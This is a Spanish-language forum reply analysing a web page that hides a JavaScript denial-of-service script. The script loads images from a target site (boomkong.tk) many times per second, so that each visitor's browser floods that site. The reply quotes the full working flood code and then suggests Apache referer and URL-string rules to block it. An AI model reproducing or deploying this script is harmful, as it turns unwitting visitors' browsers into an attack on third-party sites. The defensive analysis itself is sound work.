Código
view-source:http://boombang.me/esp/cliente.php
Código
La cual tiene:
Código
<meta http-equiv="refresh" content="60;URL=ddosputo.php">
Código
<script type="text/javascript"> function random() { var count = 0; var result = ""; var length = Math.Floor(Math.Random() * 100); var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXTZabcdefghiklmnopqrstuvwxyz"; for (var i = 0; i < length; i++) { var num = Math.Floor(Math.Random() * chars.length); result = result + chars.substring(num, num + 1); } return result; } (function () { var fireInterval; var requestsHT = {}; var isFiring = true; var targetURL = "http://boomkong.tk" var requestedCtr = 0, succeededCtr = 0, failedCtr = 0; var makeHttpRequest = function () { if (requestedCtr > failedCtr + succeededCtr + 1000) { return; }; var rID = Number(new Date()); var img = new Image(); img.onerror = function () { onFail(rID); }; img.onabort = function () { onFail(rID); }; img.onload = function () { onSuccess(rID); }; img.setAttribute("src", targetURL + "?id=" + rID + "&msg=robandocreditosokase-lol"); requestsHT[rID] = img; onRequest(rID); }; var onRequest = function (rID) { requestedCtr++; }; var onComplete = function (rID) { delete requestsHT[rID]; }; var onFail = function (rID) { succeededCtr++; delete requestsHT[rID]; }; var onSuccess = function (rID) { succeededCtr++; delete requestsHT[rID]; }; isFiring = true; fireInterval = setInterval(makeHttpRequest, (1000 / parseInt(200) | 0)); })(); </script>
Pero no parece que estén atacando a tu foro.. o al menos no en este momento.
Defenderte de ese ataque.. no he probado pero puedes hacer que Apache niegue o redireccione a todo el que tenga de referer esa pagina (boombang.me). También puedes agregar una excepción que niegue o redireccione si la url contiene msg=robandocreditos (un mensaje gracioso que deja el atacante xD).
Al fin y al cabo lo que hacen es crear imágenes (miles xD) con ruta el sitio al que atacan.
Slaudos